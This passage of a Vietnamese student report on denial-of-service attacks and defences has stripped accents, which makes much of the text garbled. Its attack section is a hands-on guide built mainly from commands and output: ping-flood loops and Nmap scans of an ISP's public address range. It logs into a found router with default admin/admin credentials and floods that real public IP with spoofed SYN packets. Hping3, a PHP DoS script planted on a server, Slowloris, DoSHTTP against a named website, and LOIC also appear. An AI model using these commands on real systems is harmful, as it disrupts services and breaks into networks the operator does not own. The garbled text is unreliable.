3.5 Php l Phn tch router, firewall, v IDS logs nhn bit ngun ca lu lng DoS. Mc d k tn cng thng thng gi mo a ch ngun, du vt IP tr li vi tr gip ngay lp tc ca ISP v thc thi php lut cc c quan c th cho php bt cc th phm. Phn tch mu lu lng: D liu c th c phn tch-sau tn cng- tm kim c im ring bit trong lu lng tn cng. Mu lu lng tn cng DoS c th gip ngi qun tr mng pht trin k thut lc ngn nga i vo hoc i ra mng Dng nhng c im, d liu c th c dng cp nhp cn bng ti v iu chnh bin php i ph.

4. Bo v DoS
4.1 Mc ISP Nhiu ISP n gin kha tt c yu cu trong thi gian tn cng DoS, t chi lu lng hp php t truy cp dch v. ISP a ra m my DoS bo v ng lin kt internet v vy h khng th bo ha bi cuc tn cng. Lu lng tn cng c chuyn hng ti ISP trong cuc tn cng lc v gi tr li. Qun tr mng c th yu cu ISP kha ngun IP tc ng v di chuyn trang web ti IP khc sau khi thc hin lan truyn DNS.

(Cu hnh kch hot ngt TCP trn phn mm IOS Cisco)
30

4.2 H thng bo v IntelliGuard IntelliGuard DPS tr gip lm du tn cng DoS c thit k tp trung vt qua lu lng hp php hn l b qu lu lng tn cng.Cp bc hc bo v chin lc nhn bit v tr truy cp bng cch u tin cho khch hng v xp hng truy cp ca h.Qun l lu lng a cp cu hnh gii hn lu lng v m bo cho vic qun l lu lng cho mi thnh phn ca mng.

II.CNG CU BO V DOS
1. NetFlow Analyzer
NetFlow Analyzer, mt cng c phn tch lu lng y , thc y cng ngh phn tch lu lng cung cp kh nng hin th thi gian thc v hiu sut bng thng mng. Ch yu NetFlow Analyzerl mt cng c gim st bng thng, c ti u ha hng ngn mng li trn ton th gii bng cch a ra ci nhn ton din v bng thng mng v cc mu lu lng truy cp. NetFlow Analyzer l mt gii php thng nht thu thp, phn tch v bo co v bng thng mng ca bn ang c s dng v ngi s dng. NetFlow Analyzer l i tc tin cy ti u ha vic s dng bng thng trn ton th gii ngoi ra n thc hin gim nh mng v phn tch lu lng mng.

31

Hnh 2.1 Cng c NetFlow Analyzer

2. Mt s cng c khc
D-Guard Anti-DDoS Firewall D-Guard Anti-DDoS Firewall cung cp ng tin cy nht v nhanh nht bo v DDoS cho cc doanh nghip trc tuyn, v cc dch v phng tin truyn thng, thit yu h tng cng cng v cung cp dch v Internet. L mt chuyn nghip Anti-DDoS Firewall, D-Guard c th bo v chng li hu ht cc cuc tn cng cc loi, bao gm c DoS / DDoS, Super DDoS, DrDoS, Fragment tn cng, tn cng SYN l lt, l lt tn cng IP, UDP, UDP t bin, ngu nhin UDP Flooding tn cng, ICMP, IGMP tn cng, ARP Spoofing, HTTP Proxy tn cng, CC Flooding tn cng, CC Proxy tn cng,
32

D-Guard Anti-DDoS Firewall cung cp mt cp trn cch tip cn c bn gim nh cc cuc tn cng DDoS, vi mt thit k tp trung vo giao thng qua hp php ch khng phi l loi b giao thng tn cng, x l cc cuc tn cng kch bn c th suy thoi ti t nht m khng cn hiu sut.

Hnh 2.2.1 Cng c D-Guard Anti-DDoS Firewall

FortGuard Firewall FortGuard Firewall - mt gii php gip ngi dng chng li cc cuc tn cng DDoS vi chnh xc v hiu sut cao nht... FortGuard Firewall l mt phn mm tng la Anti-DDoS nh nhng mnh m vi Intrusion Prevention System sn c.N c th bo v my tnh ca bn chng li cc cuc tn cng DDoS chnh xc nht vi hiu sut cao nht. FortGuard Firewall c th chng li SYN, TCP Flooding v cc loi tn cng DDoS khc v kh nng thy c cc gi tn cng thi gian thc. Chng trnh cho php bn v hiu ha/ kch hot truy cp qua proxy vo tng ng dng v c th ngn chn hn 2000 kiu hot ng ca hacker.

33

Hnh 2.2.2 Cng c FortGuard Firewall

III.KIM TRA THM NHP DOS

H thng server d b tn cng DoS th nn kim tra thm nhp tm hiu i ph. Mt h thng d b tn cng khng th x l s lng ln lu lng gi v sau b treo hoc gim tc , do ngn nga truy cp bng cch chng thc ngi s dng. Kim tra thm nhp xc nh ngng ti thiu cuc tn cng DoS trn h thng , nhng ngi kim th khng ch quan l h thng bn vng trc chng tn cng DoS. i tng chnh kim tra thm nhp DoS lm trn ngp lu lng h thng mc tiu, tng t nh hng trm ngi lin tc yu cu dch v, lm cho server hot ng lin tc khng c gi tr. Dng tool kim tra theo cc bc nh sau:
34

1. Kim tra web server dng cng c t ng nh l Web Application Stress(WAS) v Jmeter cho kh nng chu ti, hiu sut server, kha, v kh nng m rng pht sinh. 2. Qut h thng dng cng c t ng nh NMAP, GFI LANGuard, v Nessus khm ph bt k h thng d b tn cng DoS. 3. Trn ngp mc tiu vi yu cu gi tin kt ni dng cng c Trin00, Tribe Flood, v TFN2K. 4. Tn cng trn ngp cng lm y cng v tng s dng duy tr tt c yu cu kt ni lm tc nghn cng.Dng cng c Mutilate and Pepsi5 t ng tn cng trn ngp cng. 5. Dng cng c Mail Bomber, Attache Bomber, v Advanced Mail Bomber gi s lng mail ln cho mail server mc tiu. 6. in vo cc mu ni dung ty v ko di lm trn ngp trang web.

35

PHN III: HNG DN MT S K THUT TN CNG DOS

1. Ping of Dealth Attack
Trong h iu hnh Window ta c th s dng lnh ping IP -t -l 5000 ping mt destination mt cch lin tc

Nu nh bn mun m cng mt lc 20 ca s Window ping th ta c th kt hp vi cu lnh For nh sau For /L %i in (1,1,20) do start ping 192.168.1.254 -t -l 36000 nh vy chng trnh s m ra cng mt lc 20 ca s window ping lin tc n IP 192.168.1.254

36

Kiu tn cng ny s gi lin tc gi ping request ti victim v victim x l bng cch gi icmp relay ti my attacker.

(Bt wireshark khi b tn cng trn ngp ICMP bng Ping of Death)

Kt lun: Kiu tn cng ICMP l kiu tn cng c in nht, rt d thc hin. Cc router cu hnh yu rt d b tn cng v treo nhanh chng.

37

2. Syn Flood Attack

bi ph n ny ta s th thc hin SYN Flood Attack vo router ADSL. u tin ta xc nh xem hin ti ang c bao nhiu router ADSL ang m port 80 bng cng c Nmap Gi s IP Public hin thi ca mnh ang l 118.68.226.103, ta s dng cu lnh nmap sS p 80 118.68.226.1/24 scan

Ta thc hin scan v xut ra file l scan_adsl.txt

Kim tra ni dung file scan_adsl.txt v chn ra mt IP ta lm lab tip tc

38

V d trong 1 on file scan_adsl.txt c ni dung nh bn di ngha l IP 118.68.226.7 ang m port 80 Nmap scan report for adsl-dynamic-pool-xxx.hcm.fpt.vn (118.68.226.7) Host is up (0.037s latency). PORT STATE SERVICE 80/tcp open http Ta vo trnh duyt web kim tra IP trang web ca IP ny v th nhp vo username: admin v password admin mc nh

Ta s thc hin syn flood attack vo port 80 trn router ADSL ny b ng cng c syn-flood-alpha1.tar.gz. Ta thc hin qu trnh ci t ging nh bn di.
39

root@bt:~/Desktop# ls scan_adsl.txt syn-flood-alpha1.tar.gz root@bt:~/Desktop# tar -xvf syn-flood-alpha1.tar.gz syn-flood/ syn-flood/Makefile syn-flood/gpl.txt syn-flood/syn-flood.cpp root@bt:~/Desktop# cd syn-flood root@bt:~/Desktop/syn-flood# ls gpl.txt Makefile syn-flood.cpp root@bt:~/Desktop/syn-flood# make g++ -O2 -g -Wall -fmessage-length=0 -c -o syn-flood.o syn-flood.cpp g++ -o syn-flood syn-flood.o Ta thc hin qu trnh tn cng bng cu lnh bn di gi ra 100000 gi tin syn root@bt:~/Desktop/syn-flood# ./syn-flood Usage: ./syn-flood --IPIP --port PORT [verbose] -h --help Display this usage information. -i --IP Destination IP address. -p --port Destination port. -n --num Number of packets to send. -v --verbose Print verbose messages. root@bt:~/Desktop/syn-flood# ./syn-flood -i 118.68.226.7 -p 80 -n 1000000 Sent 1000000 packets. Ta s dng chng trnh Wireshark phn tch qu trnh hot ng ca cng c ny th thy chng trnh gi ra 100000 gi tin TCP SYN n victim v router adsl vi IP 118.68.226.7 vi cc source IP l cc IP gi khc nhau.

40

3. S Dng Hping3 thc hin Syn Flood Attack

My victim c IP l 192.168.1.101/24 ( Window XP ) v my attacker c IP l 192.168.1.100/24 ( Back Track 5 ) u tin ta thc hin qu trnh scan cc port ang open ca Victim bng cng c Nmap root@bt:~# nmap -sS 192.168.1.101 PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:0C:29:9F:87:19 (VMware) Ta s dng hping3 SYN Flood vo port ang m l 445 root@bt:~# man hping3 => Kim tra cc thng s ca hping3 root@bt:~# hping3 -a 192.168.1.254 -p 445 192.168.1.101 -S -i u100 =>thc hin SYN FLOOD vo victim c IP l 192.168.1.101
41

-a gi dng IP 192.168.1.254 -p port 445 -S thc hin Syn Flood attack -i --interval wait (uX for X microseconds, for example -i u1000) --fast alias for -i u10000 (10 packets for second) --faster alias for -i u1000 (100 packets for second) --flood sent packets as fast as possible. Don't show replies. root@bt:~# hping3 -a 192.168.1.254 -p 445 192.168.1.101 -S -i u100 c 100000 -c ngha l count, ta s gi 100000 n victim Ti my Victim nu nh b SYN Flood ta kim tra trng thi kt ni bng lnh netstat -ano th thy xut hin rt nhiu kt ni SYN

42

4. PHP DoS
Ta s thc hin upload source PHP DoS ln mt Web Server, v s dng server ny tn cng mt server khc. u tin ta thc hin vic upload source vo chng trnh PHP DoS vo Web Server

Restart li dch v apache

43

Ta s dng trnh duyt web kt vo trang PHP DoS hoc s dng trong Folder km theov thc hin tn cng vo victim no

Sau khi attack xong th chng trnh s thng k li cho ta s lng gi tin.

S dng wireshark capture li traffic th ta s c c hnh nh bn di.

44

5. Apache DoS Slowloris

Slowrist nh hng n Web Server Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer.. cn cc web server ca Window IIS 6.0, IIS 7.0 th khng nh hng bi cng c ny Download source code ti http://ha.ckers.org/slowloris/slowloris.pl v to thnh file c tn l slowloris.pl Gn cho chng trnh c quyn thc thi

Kim tra xem chng trnh slowloris c on gi tr timeout

45

Thc hin DoS vo mt victim bng cu lnh perl ./slowloris.pl -dns www.abc.com -timeout 2000 -num 500 -tcpto 5, ta nn xem thm trong phn help ca chng trnh bit thm ngha ca cc bin

46

Bt u gi gi tin.Ch cho t s lng gi tin v xem kt qu.

47

6. DoSHTTP Tin hnh ci t tool

48

 Bt WireShark bt, xem v kim tra gi tin

Vo Website mc tiu kim tra : www.ithutech.net

Kim tra WireShark thy cc kt ni ti www.ithutech.netbnh thng

49

Xc nh mc tiu v bt u tn cngl : www.ithutech.net

Kim tra cc kt ni trong WireShark khi tn cng

50

 Kim tra Website bng cch vo li Website 1 ln na v thy khng vo c.

Tt phn mm
51

 File bo co sau khi s dng phn mm DoSHTTP

52

7. LOIC
Dng cng c LOIC tn cng website http://abc.com bng nhiu kiu: TCP, UDP, HTTP v chnh tc tn cng nhanh hay chm.

(Tn cng bng nhiu kiu vi LOIC)

(Bt gi tin trong khi tn cng dng LOIC)

Kt Lun: Cng c LOIC rt mnh, h tr nhiu kiu tn cng.

c bit, LOIC dng kt ni cc tnh nguyn vin dng botnet tn cng mc tiu.

=>Kt Lun
Da vo kt qu thc nghim v kt qu ca m hnh phng chng.Ta phn no hiu hn v vic th no l tn cng t chi dch v (DoS).Qua chng minh cho ta thy tnh ph hoi ca cc cuc tn cng DoS gy hu qu nh th no vi h thng, n c th lm cho h thng b nghn v nu l mt cuc tn cng ln th c th lm h thng reboot v nu h thng lin quan n ti chnh th c th nh hng khng nh n ti chnh ca cng ty cha h thng .

53

NHN XT CA GING VIN HNG DN

54